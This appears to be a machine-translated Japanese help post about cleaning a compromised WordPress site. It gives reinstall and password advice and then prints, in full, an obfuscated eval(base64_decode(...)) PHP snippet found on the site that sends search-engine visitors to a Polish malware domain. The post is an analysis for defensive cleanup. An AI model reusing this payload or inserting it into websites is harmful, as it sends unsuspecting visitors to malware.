Googleは私のサイトにマルウェアが含まれていると言っています

WordPressインストールが危険にさらされている可能性が高いです。

恒久的な解決策は、これらの手順に従って、完全にクリーニングされ、再発を防ぐことです。これは、完全にクリーンであることを保証する最良の方法です。

1. データベースをバックアップする
2. プラグインやその他の変更など、カスタマイズをメモします。
3. サイトからすべてのファイルを削除します。WordPressに含まれていないものは必ず保存してください。
4. WordPressを再インストールする
5. データベースを復元する
6. WordPressユーザーが正しく承認されていることを確認します
7. 使用していたプラグインを再インストールします
8. 既知のクリーンコピーから追加の.phpファイルをリロードします

これは、サイトが以前に攻撃されておらず、サイトの奥深くに隠されたバックドアがロードされていることを確認するための最良の方法です。

WordPressソフトウェアを最新の状態に保ち、WP管理者、FTP、およびデータベースに強力なパスワードを使用すること、およびすべてに同じパスワードを使用しないことが非常に重要です。それら。

追加情報： GoDaddyケーススタディ

スクリーンショットを使用してこれらの画像を再作成し、それらを再保存してサイトで置き換えます。それらに隠されたマルウェアは、その方法で削除されます。

更新

このスニペットには、ユーザーがGoogle、Yahoo、またはBingの検索でサイトを見つけた場合に、偽の検索ページを提供し、ユーザーのコンピューターにマルウェアをロードしようとするポーランドのサイトにユーザーをリダイレクトするコードが含まれていました。

これは、chmod 666を持つphpファイルにありました

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbS FRU UF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));

Google yahooまたはbingを介してアクセスされたときにのみ表示されるため、マルウェアを見ることができませんでした...